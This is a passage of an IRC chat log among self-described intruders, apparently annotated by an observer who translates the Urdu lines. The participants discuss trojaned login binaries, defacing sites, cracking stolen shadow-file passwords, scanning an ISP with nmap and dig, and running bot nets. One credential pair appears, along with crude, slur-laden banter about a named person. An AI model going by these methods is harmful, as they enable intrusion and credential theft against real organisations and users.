:Sp07 :for what? :Sp07 :anyways no :Sp07 :eheh :Sp07 :I dont have anything :Sp07 :only thing I have is my pride :D1ck :lol :D1ck :m4d 3l337 tr0j4n by d1ck :Sp07 :change your bj password :Sp07 :for each shell :D1ck :why? :Sp07 :cause if 1 of your shells get hacked :D1ck :its easy to sniff :D1ck :? :Sp07 :people can find out the bj password :Sp07 :no :Sp07 :people can hack your shell and find out your password :D1ck :how? :D1ck :TERM :D1ck :TERM???? :D1ck :HOW :D1ck :? :Sp07 :uhh :Sp07 :just view /bin/login :Sp07 :let me on your shell :Sp07 :and I will find out your password :Sp07 :hehe :D1ck :hehe :D1ck :oh :D1ck :the codder sux :D1ck :he should have crypted it :D1ck :so no hex editors could read it :Sp07 :type :Sp07 :more /bin/login :Sp07 :and look throught it :Sp07 :and you will se your password :Sp07 :like TERM= :Sp07 :password :Sp07 :or something :D1ck :oh :D1ck :kewl :D1ck :******** /bin/login: Not a text file ******** :Sp07 :? :D1ck :with more u cant view binaries :D1ck ::P :Sp07 :yes you can :D1ck :no :Sp07 :# more /bin/login :Sp07 :ELF (4]4 (44sstt2 :Sp07 :)0$.=<\h ( :Sp07 :, $,4 ($PH:t^LP :Sp07 :V\]hbiq(w } :Sp07 :--More--(5%) :Sp07 :hehe :D1ck :heh :Sp07 :its in there :Sp07 :in all that junk :D1ck :i cant :Sp07 :on that shell you cant :Sp07 :cause its gay :Sp07 :hehe :D1ck :cat :D1ck :? :Sp07 :yeah :D1ck :hehe :D1ck :k :Sp07 :you can use cat :Sp07 :cat /bin/login | more :Sp07 :do that :Sp07 :heeh :D1ck :k :D1ck :whats TERMTYPE for ansi? :D1ck :i forgot :D1ck :vt100 :D1ck :is normal :D1ck :ani :D1ck :?? :Sp07 :? :Sp07 :vt100 -=- Day 10 June 13 :D1ck :noo :D1ck :hrm :Sp07 :i dont know :Sp07 :vt200? :Sp07 :vt102 :Sp07 :ansi :Sp07 :type in ansi :D1ck :hrm :Sp07 :for termtype :Sp07 :ehhe :D1ck :hehe :D1ck :w00p u leaked my pass :D1ck ::P :Sp07 :? :D1ck :j/k :Sp07 :let me on your shell :Sp07 :I will find your pass :D1ck :it's ok :D1ck ::) :D1ck :jp is leet :D1ck :un ownable :Sp07 :japane? :D1ck :yeah :D1ck :hehe :D1ck :hry :D1ck :hey :D1ck :i owned one :D1ck :kekekke :D1ck :ACTION suspects Sp07 is a fed :D1ck :well :D1ck :can a fed bust me? :D1ck :no :D1ck :? :D1ck :bbl :D1ck :sleep :D1ck :10 in morning here :D1ck :sleeps :D1ck ::) :D1ck :ACTION is away: (sleep) [BX-MsgLog On] :D1ck :.add D1ck * D1ck 100 1 4 :D1ck :.save :D1ck :kaos_ nick rhtc :D1ck :nohup_ nick industrial :D1ck :J4n3 :D1ck :ACTION is away: (sleeps) [BX-MsgLog On] :Sp07 :you got any legit shells? :D1ck :nope :D1ck :CHAO :D1ck :sleeping :J4n3 :J4n3 :D1ck :nohup_ nick PHAT :D1ck :.add D1ck * D1ck 100 1 4 :D1ck :.save :D1ck :nohup_ nick PHAT6 :Sp07 :phat6 nick dicksuck :m4ry :sigh :m4ry :LOG THIS :dinto :hey d1ck :atlanta.ga.us.undernet.org 005 pencil SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server :dinto :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :D1ck :.join # :D1ck :.part :D1ckhack :.join #k1dd13 cafe2 :D1ckhack :.join #k1dd13 cafe2 :D1ckhack :.join #k1dd13 :D1ckhack :.part :D1ck :dos save :Sp07 : :D1ck :? :Sp07 :@ :bitch :ho :h4r33 :take over :D1ck :(h4r33/ :D1ck :host-l: No such nick :D1ck :h4r33: No such nick :D1ck : Signon by h4r33 :D1ck :(h4r33/ :D1ck :host-l: No such nick :D1ck :h4r33: No such nick :D1ck :wtf :D1ck :? :Sp07 :hehehe :Sp07 :#k1dd13 = -n :D1ck :ph3w :Sp07 :gwwgww :Sp07 :gheheh :Sp07 :ehe :Sp07 :he :D1ck :hey :D1ck :check if kaos@211.46 :D1ck :is klined :D1ck :from atlatna :D1ck :and :D1ck :stuff :D1ck :? :Sp07 :nope :Sp07 :dont think it is :D1ck :why arnt the bots up? :D1ck :all running ./mech :D1ck :i checked :Sp07 :dunno :Sp07 :there was some bug :Sp07 :on some emech versino :Sp07 :where it wouldnt reconnect to servers :Sp07 :but that was long ago :Sp07 :when I used to use emechs :D1ck :no :D1ck :i have the new one :HPUX :EnergyMech 2.7.6u1 :D1ck :lol :D1ck :man :D1ck :u ever owned nxt? :Sp07 :thats not that new I think :D1ck :err bind :D1ck :? :Sp07 :nope :D1ck :? :D1ck :coz like :D1ck :? :Sp07 :you asked me that yesterdya :D1ck :oh :D1ck :oh :D1ck :no i dint :Sp07 :yes you did :Sp07 : :Sp07 :@@@@@@@ :Sp07 :######### :Sp07 :$$$$$$$$ :Sp07 :% :D1ck :OH :D1ck :well :D1ck :NO :D1ck :I DINT@ :Sp07 :$$$$$$$$$$ :Sp07 :########## :Sp07 :YYYYYYYYY :Sp07 :EEEEEEE :Sp07 :SSSSSSSS :Sp07 : DSFFFFF :D1ck :man :D1ck :my freind is 16 :D1ck :and she is a mother :D1ck ::() :Sp07 :so? :D1ck :15 :Sp07 :hehe :D1ck :15 :Sp07 :at my school there are lots of pregnant girls there :Sp07 :I go to continuation high school :D1ck :heh :D1ck :HAHAHAHAHHAAH :Sp07 :babies there :Sp07 :lots :Sp07 :hehe :Sp07 :like 1/4 of the girls are either pregnant or have babies :D1ck :LOL :Sp07 :my school has like 100 studenst in it :D1ck :HAHAHAHAHA :D1ck :kewl :D1ck :babies? :D1ck :they dont abort? :D1ck :abortion = brutal :Sp07 :nope :D1ck :kewl :D1ck :u saw a 13 year old pregnent girl ever? :Sp07 :nope :D1ck :k :Sp07 :yo yo yo yoyo yooyyoyoyoyoyoyyoyoyoyoyoooooooooooyyyyyyyooooooooyyooooyoyoyoyyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyo :Sp07 :you should start eggdrop net :Sp07 :instead of mechs :Sp07 :eggdrops are better :D1ck :well :Sp07 :yOOYOYYOoyoOYOYOYOyOYOOYOYoyyoyoyoYOOyoYOyoOYOYOYOYOyooyOYOyoYoYO :Sp07 :WASupSUPUpsUWpASUPWUSpwuAPSUpsu :D1ck :may eb :Sp07 :maybe? :Sp07 :dick :Sp07 :ass :Sp07 :fuck :Sp07 :vbbbbbbbbbbujh :Sp07 :uk :Sp07 :I AM BORED AS FUCK :Sp07 :FUCK FUCK FUCK :Sp07 :IS IT 12:00 IN PAKISTAN? :Sp07 :03.............................................2111111111111111111564987654144444444++++++++++-*****///////-*/81*0.-+*/801 :Sp07 :+950+950974**-77055555121654 :D1ck :yep :D1ck :exactly 12 :D1ck :night :Sp07 :seeeee :D1ck ::P :Sp07 :how :Sp07 :smart :Sp07 :I :Sp07 :am :Sp07 :time to play some starcraft :Sp07 :afk :D1ck :haha :D1ck :k :Sp07 :while im playing :Sp07 :starcraft :Sp07 :I :Sp07 :want you to :Sp07 :change all your :Sp07 :mechs :Sp07 :to eggdrops :Sp07 :ok :Sp07 :? :Sp07 :? :D1ck :well :Sp07 :your too lazy too :Sp07 : :D1ck :i`ll think about it. :Sp07 :haheha :Sp07 :ill give you tcls to use :D1ck :;P :D1ck :k :Sp07 :29-2-2 :Sp07 :thats my score :Sp07 :5-2-2 :Sp07 :is my ladder score :Sp07 :tahts how good I am :D1ck :k :J4n3 :chayeen chapa chayeen chapa kay chayeen, paaniyon main cheentay uraathee huwee larkee :J4n3 :dekheeeeee hai humnain aathi huwee lehron say jaathi huwee larkeeee :D1ck :ins :D1ck :J4n3 :D1ck :i`m trying to own example.com :D1ck :and bollywodpages :J4n3 :thats kewl D1ck :J4n3 :defacing will be popular :p :Sp07 :go hack me a bounce d1ck :Sp07 :fast 1 :m4ry :w3rd :m4ry :what happened to the other bots? :J4n3 :m4ry sup ? :J4n3 :bots glined i think :D1ck :HEH :m4ry :hey J4n3 :D1ck :HEATAZ :m4ry :again? ;) :D1ck :8.2 :D1ck :? :J4n3 :heh :m4ry :SN1P3R :D1ck ::) :D1ck :SUp :D1ck :? :m4ry :8.2? :m4ry :scan wol already :D1ck :yeah :m4ry :i'm stuck here with my roots going up/down :m4ry :24/7 :D1ck :no :D1ck :tell me :m4ry :can't tell if it's my end that's down or theirs :m4ry :./nmap -sP -PI wol.net.pk/24 :m4ry ::) :D1ck :hahahaha :D1ck :ROFL :D1ck :m4ry :D1ck :tell me :D1ck :? :D1ck :when i query :D1ck :it goes through :D1ck :and dont sow on my NS :D1ck :dig @www.example.com dick.snip.example.net a :D1ck :i tried :D1ck :IN NXT :m4ry :dig IN A @blah www.haha.heatz.snip.example.net :D1ck :?????? :m4ry :or :m4ry :dig IN NXT @blah www.haha.heatz.snip.example.net :m4ry :same thing :m4ry :make subdomains of subdomains :m4ry :and keep making different ones :m4ry :cos sometimes the DNS records get cached :D1ck :www? :D1ck :subdomain is snip.example.net :D1ck :subdomain is snip.example.net :D1ck :oh :D1ck :i do :m4ry :ur authorative over sovg.net? :m4ry :or whatever :m4ry :WOL is l33t :m4ry :they run BSDI :m4ry :most others here run NT :m4ry :[root@localhost /root]# dig @radius.wol.net.pk version.bind chaos txt :m4ry :VERSION.BIND. 0S CHAOS TXT "4.9.7-REL" :m4ry :LOL :D1ck :yep :D1ck :socg :D1ck :man :D1ck :U GOT LINUX :D1ck :? :D1ck :U GOT LINUX????????? :D1ck :U GOT LINUX????????? :D1ck :U GOT LINUX????????? :m4ry :ur lagging :m4ry :are u mad :D1ck :HEATAZ :D1ck :U I KHI? :m4ry :i'm sitting in this shithole of a city :D1ck :and u got LINUX :D1ck :HAW :m4ry :with no healthy computer for miles :D1ck :? :D1ck :? :D1ck :hahahaha :D1ck :well :D1ck :nxt is starting to suck :D1ck ::) :m4ry :i'm getting some flak here :m4ry :nxt? :m4ry :why? :m4ry :works 99% of the time for me :) :m4ry :SCAN WOL :m4ry :CLASS B :m4ry :WOL.NET.PK :m4ry :FOR NAMED & BSD SHIT :m4ry :i'm out :m4ry :my cuz is out of hours (again) :m4ry :i am indeed, cut-off :m4ry :LOL :D1ck :heh :D1ck :no bots? :D1ck ::( :D1ck :'flak'? :D1ck :heh :D1ck :i cant own www.example.com :D1ck :haha this freind's quit message :D1ck :rofl :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :D1ck :J4n3 :D1ck :mera babies :Sp07 :my script is elite now :Sp07 :hahaah :D1ck :hahaha :Sp07 :after I get like 10 more bots :Sp07 :and like :D1ck :i am a cool member of diz-crew :D1ck :HAHAHA :Sp07 :finish the script :D1ck :founded by h4r33 :D1ck :./ == welcome :Sp07 :Co0l :Sp07 :./ :D1ck ::) :Sp07 :./ :Sp07 :./ :D1ck :HHEH :Sp07 :./Sn1p3R :D1ck :./HEH h4r33 :Sp07 :./DiSeasE :D1ck :rofl :D1ck :;) :Sp07 :./SpITz :Sp07 :./PhAT6 :D1ck :anyway :D1ck :~ :D1ck : :D1ck : :D1ck :SHUTUP :D1ck :heh :Sp07 :oK :D1ck : :D1ck :_ :Sp07 :_ :J4n3 :(_|_) :Sp07 :0 \/\/4 :J4n3 :(*Y*) :D1ck :heh :D1ck :WHO WILL SEXOR ME :D1ck :? :Sp07 :my dog will :J4n3 :8==D :J4n3 :lol :D1ck :dude :Sp07 :doggy style :D1ck :i dont like dogs :D1ck ::( :Sp07 :ok :D1ck :EVERY ONE TYPE control + a :D1ck :EVERY ONE TYPE control + S :D1ck :EVERY ONE TYPE control + S :D1ck :in linux :D1ck ::) :D1ck :PHAT6 :D1ck :Tota1KaaS :J4n3 :i'm on w1nbl0w5 :Sp07 :PHAT6 :D1ck :inetd-s :D1ck :inetd-s :D1ck :anker :D1ck :CyneX :D1ck :w00p :Sp07 :metoo :Sp07 : control + a :Sp07 : control + S :Sp07 : control + S :Sp07 :control ass :D1ck ::) :D1ck :hi :D1ck :J4n3: i`m trying www.example.com and www.example.com :J4n3 :any luck so far ? :D1ck :but cant own it :D1ck :ACTION wonders :D1ck :i`m trying. :D1ck :nopes :D1ck :well :J4n3 :hmm :D1ck :J4n3 :D1ck : /dcc send d1ck cracked.example.txt :D1ck ::P :J4n3 :hahah kesc walay karnay dain tho na :J4n3 :waiasy oye ye waqayee example kee file hai ? :Sp07 :uhh you like sending things to yourself? :Sp07 :hehe :D1ck :ofcourse :D1ck : waiasy oye ye waqayee example kee file hai ? :D1ck :? :Sp07 :waiasy oye ye waqayee example kee file hai :D1ck :kyoon nahin ? :D1ck :example ki file ai :D1ck :HAHAHAHHA :D1ck :Sp07: shutup, were speaking urdu :J4n3 :ek niklaa thaa, user : nycop pass : 1955 :D1ck :heh :J4n3 :chala nahin :Sp07 :kesc ye karnay kee tho waqayee :D1ck :k :J4n3 :lol :D1ck :;P :J4n3 :Sp07 speakin urdu wow :Sp07 :yup :Sp07 :chala :D1ck :hahah :D1ck :LOL :D1ck :Sp07 madr chode :D1ck :chootiyay :D1ck :randi kay ... :Sp07 :you :Sp07 :kay chootiyay madr :D1ck ::P :D1ck :? :D1ck :HAHAHAHAH :J4n3 :hahahha :J4n3 :barwa dalla :D1ck :lol :Sp07 :SI SI :D1ck ::) :Sp07 :MUY BIEN :D1ck :ACTION fingers Sp07 wet pussy :Sp07 :oh yeah :Sp07 :ACTION fingers d1ck dry pussy :D1ck :jane sun .in ko sadmind and ttdb kar :D1ck :deface :Sp07 :deface my dick :D1ck :dude :D1ck :i would :D1ck :but :D1ck :problem :D1ck :is :Sp07 :I know I know :Sp07 :too small :Sp07 :FUK U :D1ck :that :D1ck :u :D1ck :dont :D1ck :have :D1ck :1 :D1ck ::( :Sp07 :ACTION pulls of dick :Sp07 :ACTION shoves dick in d1cks face :Sp07 :ACTION puts dick back on :D1ck :haha :D1ck :OH :D1ck :NOW THATS FLEXIBLE :D1ck :J4n3 :D1ck :he thinks i am a fed :D1ck :fbi :Sp07 :fBi :D1ck :fBi.gOV :Sp07 :uhh :Sp07 :thats my server :Sp07 :fBi.GoV :Sp07 :DiSeAsE.fBi.GoV :D1ck :LAILA :D1ck :P00P :D1ck :J4n3 :Sp07 :you guys live near each other? :D1ck :yep :D1ck :he's my anal partner :D1ck : :D1ck ::) :D1ck :and some times we do 3some :D1ck :heh :Sp07 :he :Sp07 :heh :Sp07 :POLICE OUTSIDE MY HOUSE :Sp07 :let me go get my gun :Sp07 :jk hehehe :Sp07 :did you deface onghome.com :D1ck :no :Sp07 :deface yahoo.com :D1ck :its not my box :D1ck :J4n3 :Sp07 :and people will respecty ou :Sp07 :hehe :D1ck :J4n3 s :D1ck :heh :D1ck :i mostly do indian sites :Sp07 :www.india.com :Sp07 :orsomethign :Sp07 :ehe :Sp07 :somethinf famous :Sp07 :like whitehouse.gov :nohup :hey look at my ip :nohup :i am a kewl bot :nohup :should i deface this? :Sp07 :no :Sp07 :yeah :Sp07 :you should deface it then delete everything :Sp07 :and when they get it back up :Sp07 :hack it again :D1ck :i patched it :D1ck :but i will depatch it :D1ck :J4n3 :D1ck :where are u when i need u :D1ck :where are u when i need u :D1ck :where are u when i need u :Sp07 :with another man :D1ck :lol :D1ck :J4n3 :D1ck : /wi nohup :D1ck :fuck :D1ck :where are u :D1ck :d4v3 :J4n3 :D1ck :J4n3 :here :D1ck :i am defacing mail.example.com :D1ck :k? :D1ck :K :D1ck :? :D1ck :? :D1ck :? :J4n3 :hmm :D1ck :? :J4n3 :now ? :J4n3 :u mean defacing now ? :D1ck :yep? :D1ck :we can deface and fix the index after attrtion mirrors :D1ck :and when they will email i`ll deleted their mail from rdm database :J4n3 :oh :J4n3 :okay :D1ck :? :D1ck :wana do it? :J4n3 :actually main sonay ja raha tha, kal na karlain ??? :D1ck :ok :D1ck ::( :D1ck :hehe :J4n3 :agar if u want now, then ok :D1ck :kal kar lain gay :J4n3 :main bet jaatha hon :) :D1ck :cya :J4n3 :? :D1ck :;) :D1ck :take care :J4n3 :heh okies thanx :J4n3 :theri bhabi ut gayee hai cheekh rahi hai mujh par :J4n3 :ab sojao :J4n3 :and i'm feelin horny too :P :J4n3 :errrrr :J4n3 :see ya :J4n3 :g0ne :D1ck ::P :J4n3 ::) :D1ck :hehehe :D1ck :cya :D1ck ::) :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :Sp07 :yo d1ck :D1ck :? :D1ck :brb :D1ck :trojaning boxens :D1ck :heh :Sp07 :send me some sun5.7 exploits :Sp07 :local :Sp07 :just wanna root this box and thats all :Sp07 :hehe :D1ck :i dont have it :Sp07 :uhhhh :Sp07 :you dont have any? :D1ck :brb :D1ck :nope :D1ck :ACTION is away: (bbiab) [BX-MsgLog On] :Sp07 :scala% id :Sp07 :uid=502(kasidit) gid=10(staff) :Sp07 :uhh you suck :Sp07 :nohup? :D1ck :back :D1ck :.add D1ck * D1ck 100 1 4 :D1ck :.save :Sp07 :.add Sp07 too :Sp07 :=D :D1ck :okie :Sp07 :.add Sp07 * Sp07 100 1 4 :D1ck :.add Sp07 #k1dd13 Sp07 70 1 4 :Sp07 :hwhwhw :D1ck :heh :D1ck :.save :Sp07 :.up :Sp07 :.up :D1ck :____p____ nick in-gov :Sp07 :woho :D1ck :___up____ nick nutsack :D1ck :nohup3309 nick domestic :D1ck :nohup6607 nick hostile :D1ck :nohup6607 nick peniswise :Sp07 :nohup6607 nick blowjob :Sp07 :hehe :D1ck :nohup6607 nick blowjob :D1ck :nohup8585 nick blowjob :Sp07 :theres no passwords? :D1ck :nohup7911 nick graz :D1ck :graz nick graz-at- :D1ck :nohup_ nick dig-ns :Sp07 :nohup___ nick nutsac :D1ck :nohup____ nick [shit] :D1ck :_ohup____ sexfig :D1ck :.add D1ck * D1ck 100 1 4 :D1ck :.save :Sp07 :nohup__ nick slut :Sp07 :nohup__ nick ms-whore :D1ck :nohup__ nick slut :D1ck :nohup__ nick ms-whore :D1ck :.q :D1ck :_ohup____ nick crackX :D1ck :%_ohup____ nick whoami :D1ck :__hup____ nick uname-a :D1ck :nohup_ nick nig :D1ck :nohup__ nig die :D1ck :nohup___ nick ms-sin :D1ck :nohup__ nick hornkiten :D1ck :nohup8815 nick identd :D1ck :.save :D1ck :.add D1ck * D1ck 100 1 4 :D1ck :.save :D1ck :jej :D1ck :nohup userlist :D1ck :fuck :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :Sp07 :autoop? :D1ck :yeo :Sp07 :.say hi :D1ck :yep :Sp07 :.help PRIVMSG Sp07 :DCC CHAT CHAT 2886730091 32847 :Sp07 :damn thats a lot of bots :D1ck :dos_ nick ARGV1 :D1ck :i have 70+ :D1ck :glined :D1ck :and 42+ down :D1ck ::?( :D1ck : t mail.examplea.com 1080 :D1ck :Trying 192.168.103.131... :D1ck :Connected to mail.example.com. :D1ck :Escape character is '^]'. :D1ck :HAHAHAAHA :D1ck :dziasta uses wingate :D1ck :now :D1ck :LOL :Sp07 :? :Sp07 :heh :D1ck :rofl :D1ck :err VeNoMouS :D1ck :is :D1ck :a :D1ck :u33r :D1ck :qu33r =-= Day 11 June 14 :J4n3! :D1ck :J4n3! :moi back :p :D1ck! :yo :D1ck! :i owned mar1s :D1ck! :the real server :D1ck! :and uploaded their radius log :D1ck! :bur :J4n3! :mar1s ? :D1ck! :but they are encrypted unlike satnet :D1ck! ::( :D1ck! :mars.example.net :J4n3! :ohhh :D1ck! :give me a ip :J4n3! :then ? what's the result ? :D1ck! :i`ll tell the user name :D1ck! ::) :J4n3! :wait :D1ck! :k :J4n3! :hehe no example users online :D1ck! :lol :J4n3! :yaar example kay password jo nikal rahay hain /etc/passwd wo chal nahi rahay :/ dude whatever passwords coming out from example /etc/passwd those arent working :D1ck! :;P :D1ck! :wana deface mail.example.com [Saumil's note: example is a standard Indian greeting... example.com is an Indian site that delivers Indian gifts to the US] :D1ck! :or we should wait? :D1ck! :kewl :D1ck! ::) :D1ck! :oye :D1ck! :i have example ka personal date in MY COMPUTER I have example's personal data (i think date might be a type) in MY COMPUTER :D1ck! :over 50 MB :D1ck! :AHAHAHAHAH :D1ck! :all khawar nehal's work :D1ck! :inmy pc :D1ck! :LOL :J4n3! :haha tight :J4n3! :oye deface kardo yo let's deface (them) :D1ck! :he's 'OK' :D1ck! :oki :J4n3! :lekin yaar ye pass kyon nahi chal rahay :? but dude why arent these pass(words) working? :D1ck! :? :J4n3! :the pass from that shadow file : :D1ck! :dunno jani dont know pal :J4n3! :they r fresh they should work naa :D1ck! :;P :D1ck! :? :D1ck! :oye brb rebooting to win :D1ck! :brb :J4n3! :kkz :atlanta.ga.us.undernet.org 005 pencil SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server :D1ck! :J4n3 :D1ck! :there? :D1ck! :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :J4n3! :D1ck :J4n3! :D1ck :J4n3! :lets deface :J4n3! :wow :J4n3! :mera jooota hai japani , ye pathloon englistaani , sir pay laaal topi rooosi phir bee dil hai balochistani :p [Note: lines from a popular hindi movie song, except at the end he says my heart is Baluchistani. Baluchistan is a province in Pakistan.] :J4n3! :chunari chunari chunari = veil :J4n3! :.up :netro! :3 days 14:51:23time :PHAT! :4 days 13:45:02time :J4n3! :D1ck :D1ck! :J4n3 :D1ck! :yaar my mousr ka slot is not working dude my mouse slot isnt working :D1ck! :i am mouseless :D1ck! ::( :J4n3! :lol :J4n3! :how ? :J4n3! :port kharab hai ? is the port malfunctioning? :D1ck! :yep :D1ck! :port :D1ck! :ps/2 :D1ck! :ttys0 is modem :D1ck! :mouse ka hai magr modem work karta he the mouse's (port) is there but the modem is working as well :D1ck! :KHAWAR NEHAL IS GAY [note from Saumil: Khawar Nehal is a guy's name, and a quick Google search on him turned this up in one of the pages: Subject: Research on ISP ? From: Khawar Nehal Date: Sat, 13 Nov 1999 13:35:12 +0500 (PKT) X-Message-Number: 4 What would you like to know ? ISP as in Internet SERVICE Provider is an extremely large number of SERVICES from trying to replacing broken coffeecup holders for customers sitting in the 'dark' to setting up creating your own gateways=20 and routers so that your network stays up under DOS attacks. Thank You. --end of note] :D1ck! :I OWN HIM :D1ck! :HAHAHAHAHAHAA :D1ck! :HGOT 0 SECURITY SKILL1 :J4n3! :hahahah yeah :J4n3! :in security he is Zero :J4n3! :i told u before :D1ck! :yeo :D1ck! ::// :J4n3! :u owned example again ? :D1ck! :well :D1ck! :i lost ns1 and mail :D1ck! :but i owned mars :D1ck! :but i dunno if i still have :J4n3! :He He :J4n3! :yaar i have 800 + password of paknet, but not of karachi, :J4n3! :and they aren't working here :( :D1ck! :they close 21 22 23 513 :D1ck! ::( :D1ck! :reb.tar.gz == MASS win9.x reboot :D1ck! :by D1ck :D1ck! :oh :D1ck! :kewl :D1ck! :send me the file :D1ck! :hehe :J4n3! :3 different files 1 of quetta, pishwar and gujrawala, right now cracking fasialbad [note from Saumil: quetta, peshawar, gujrawala and faisalabad are cities/provinces in Pakistan; so is multan] :J4n3! :multan is baqi hia multan is still pending :J4n3! :bejon ? should i send? :D1ck! :? :D1ck! :yp :D1ck! :yep :D1ck! :bhej send :D1ck! : :D1ck! ::P :J4n3! :wait :D1ck! :okies :D1ck! :dokies :D1ck! :oye where are j0e's botS? :J4n3! :uska server band huwa hia kisi nay koi abuse ya dos attack kiya tha his server is down now. someone had done an abuse or a DoS attack on him :D1ck! :shit :D1ck! :finished? :J4n3! :yup :J4n3! :3 files hain ye baaqi 2 baqi hain there are 3 files and the other 2 are remaining :D1ck! :abey hey :D1ck! :oh :D1ck! : mujhay aap say milna hai i would like to meet you :D1ck! : to have a c0ke [note from saumil: dont know what this hritk is] :J4n3! : mujay aap say mil kar sex karna hai I would like to meet you and have sex with you :D1ck! : hrtik :D1ck! :hahahaha :D1ck! : find me with c0ke :D1ck! :what stupid add :D1ck! :haha :J4n3! :heh :J4n3! :oye send me that bnc file of phycoid :J4n3! :phsycoid :D1ck! :? :D1ck! :oki :D1ck! :wait :J4n3! :k :J4n3! ::) :D1ck! :dont distro :J4n3! :hehe nope :D1ck! :errrrrr :D1ck! :too many ping timeouts :J4n3! :yeah :D1ck! :WONDER jump austin.tx.us.undernet.org :D1ck! :quit :J4n3! :fuck :m4ry! :.say hi :m4ry! ::/ :m4ry! :jupe? :m4ry! :ur guys are juping DEAThaces? :Sp07! :.up :Sp07! :.up :m4ry! :hey dis :Sp07! :hy :Sp07! :hey :D1ck! :sup :D1ck! :J4n3 :atlanta.ga.us.undernet.org 005 pencil SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server :atlanta.ga.us.undernet.org 005 pencil SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server :D1ck! :J4n3 :J4n3! :D1ck :D1ck! :sup? :D1ck! :i have to go today :( :D1ck! :for mouse :J4n3! :nuff much just cracked fsd paknet, 691 paases lol :J4n3! :oh :J4n3! :yeah mouse is important :D1ck! :kewl :D1ck! : /dcc send d1ck cracked.txt :D1ck! :heh :J4n3! :heeh wiat :D1ck! :ki :D1ck! :hehe :D1ck! :coool :D1ck! :man crack zoooooooooooooom :D1ck! :man crack zoooooooooooooom :J4n3! ::p :D1ck! :;p :D1ck! :where woul those passwords work? :J4n3! :yaar uskay pass kaam he nahi kar rahay plus abee lagatha hon phir say usko, deko agar listh na jayen tho kal tho hojayega dude his passwords are not working at all. seems like let's check him out again, see if the list doesnt go through then it will be done by tomorrow :D1ck! :woul=would. :D1ck! :oh okin :D1ck! ::P :J4n3! :yaar ye samaj main nahi aaraha, in their website they says its romaing in paknet dude i cant understand this - in their website it says it is roaming in Paknet :D1ck! :roaming/. :D1ck! :? :J4n3! :roaming yeah, like u use account all over in pakistan like comsats :D1ck! :oh :D1ck! :do u put username@khi? :D1ck! :in comsats :D1ck! :u do that :J4n3! :nope try kiya :J4n3! :nahin horaha doesnt happen :J4n3! ::/ :D1ck! :oh :D1ck! ::/ :J4n3! :i tried of quetta only :J4n3! :ther aren't workin :D1ck! :oki :D1ck! :call them and ask :J4n3! :yeah i told Rsnake to call them and ask :D1ck! :'Hi main quetta say hooon :D1ck! :'Hi main quetta say hooon Hi I am from Quetta. You sister-fucker, I cant connect Hi I am from Quetta. You sister-fucker, I cant connect :D1ck! :oh :J4n3! :LOOL :D1ck! :hehe :J4n3! :haha dekho aaj pooctha hon us say, agar usnay nahi kiya call tho main karkay poochonga haha see today i will ask him, if he doesnt call, then i will do it and ask him again :D1ck! :oye is rsnake online? :D1ck! :oki :J4n3! :nahin not now nahin = no :D1ck! :oh :J4n3! :yaar that psyBNC is cooooooooooooooooool :J4n3! :tight tight :D1ck! :u know what modem he has? :J4n3! :it rox :D1ck! :for linux? :D1ck! :hehe :D1ck! :psyBNC :D1ck! :r0x :J4n3! :hmm he told me , its not zoltrix kuch ajeeb saa naam ahi hmm he told me, it is not zoltrix. some really weird name :D1ck! :ok :D1ck! :MINE SUCKS :D1ck! :$#%#$%#&^%$# :D1ck! :d4v3 :D1ck! :i want to register www.k1dd13-online.org :D1ck! :hmmm :J4n3! :hmm :J4n3! :registeration dotster.com :D1ck! :gimme some GOOD server :J4n3! :cooool :J4n3! :bu :J4n3! :but :D1ck! :? :J4n3! :i think register plus host to somewhere :D1ck! :yea :D1ck! :tell me some good server, that wuld host it? :J4n3! :there r many good servers but question is , i doubt if they host hacking site or not :D1ck! :oh :D1ck! :shit :D1ck! :i lost :D1ck! :mars :J4n3! :yeah thats the problem :J4n3! :shit :D1ck! :;p :D1ck! :but i knew i would :J4n3! :lol :J4n3! :how ? :D1ck! :HAHHHAHAAHAA :D1ck! :they reinstalled linux :D1ck! :its still vulneable :D1ck! :LOL :D1ck! :HAHAHAHAHAHAHAHAHAH :D1ck! :they reinstalled all 3 boxes :D1ck! :ROFL :J4n3! :lol :D1ck! :;p :D1ck! :i`ll hack all again' :J4n3! :u mean still vulnerable by ? bind ? :D1ck! :eYe OwN KHaWaR NeHaL :D1ck! :my brother sed 'nehal is a very proud person and he sucks' :D1ck! :yeah :J4n3! :yaar waiasy banda proudy nahin hai, kush ikhlaaq banda hai dude that way the guy isnt a proudy (slang: stuck up) chap ....seems to be a down to earth chap :J4n3! :example ka naveed admin hai , wo bara proudy hai he sux example's admin is naveed. he's really proudy - he sucks :D1ck! :yaar :D1ck! : weell i u dont take my coure u can never suceeeed in ISP bussiness [Note: seems this k. nehal guy seems to be teaching courses on how to set up ISPs] :D1ck! : fuck off :J4n3! :lol :D1ck! :hehe :J4n3! :humsay tho bauth acha raha hai , meri us say dosthi be hogayee thee kaafi he's been good to us. i developed a good friendship with him too :D1ck! : i made all isps successful :J4n3! :ek do marthaba ghar bee drop kiya tha usay a couple of times i had even visited his house :D1ck! :kewl :D1ck! :how much money did he take? :D1ck! :700 or 7000 :D1ck! :? :D1ck! :for modewl 1 :J4n3! :dunno how much personally but i think less then 5000 :D1ck! :oh :D1ck! :tell him to school us :D1ck! :hehe :J4n3! :karlega, wait will have it done, wait :J4n3! :i got one of his email about his courses, shall i forward it to u ? :D1ck! :yaar its so far for me :/ :D1ck! :yep :D1ck! :forward :D1ck! :cr15@hotmail.com and 